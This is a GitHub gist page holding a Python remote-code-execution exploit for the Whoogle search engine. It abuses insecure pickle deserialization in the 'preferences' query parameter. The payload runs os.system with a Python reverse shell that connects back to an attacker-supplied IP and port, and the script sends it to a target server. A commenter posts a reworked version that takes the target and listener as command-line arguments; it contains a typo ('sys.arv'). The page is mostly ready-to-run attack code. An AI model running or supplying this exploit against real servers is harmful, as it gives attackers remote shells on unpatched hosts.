Skip to content

Instantly share code, notes, and snippets.

@fern89

fern89/whoogle.py

Last active December 24, 2025 12:56
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save fern89/ca5fe76ad81b4bc363e7341e523a1651 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save fern89/ca5fe76ad81b4bc363e7341e523a1651 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
whoogle.py
# https://github.com/benbusby/whoogle-search RCE EXPLOIT
# https://github.com/benbusby/whoogle-search/blob/main/app/models/config.py#L265 - insecure pickle deserialize
# PATCHED IN https://github.com/benbusby/whoogle-search/commit/223f00c3c0533423114f99b30c561278bc0b42ba
# Copyright fern89, 2024
# https://fern89.github.io/posts/whoogle-rce/
import pickle, os, base64, brotli, urllib.parse, requests
targ = "http://[SERVER]/"
ipport = '("[IP]",[PORT])'
class P(object):
def __reduce__(self):
return (os.system,("python3 -c 'import os,pty,socket;s=socket.socket();s.connect("+ipport+");[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")'",))
payload = urllib.parse.quote('u'+base64.b64encode(brotli.compress(pickle.dumps(P()))).decode())
try:
requests.get(targ + "search?preferences=" + payload + "&q=", timeout=1)
except requests.exceptions.ReadTimeout:
pass
print("Exploit deployed!")
@superswan
Copy link

superswan commented Dec 24, 2025 

# usage: whoogle.py URL RHOST RPORT
import sys

targ = sys.argv[1].rstrip("/") + "/" # normalizes url 
RHOST = sys.argv[2]
RPORT = sys.arv[3]

class P(object):
    def __reduce__(self):
        cmd = f"python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"{RHOST}\",{RPORT}));[os.dup2(s.fileno(),f) for f in (0,1,2)];pty.spawn(\"sh\")'"
        return (os.system, (cmd,))

for arguments and slightly more readable. can use argparse ofc but this is just a quick solution

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment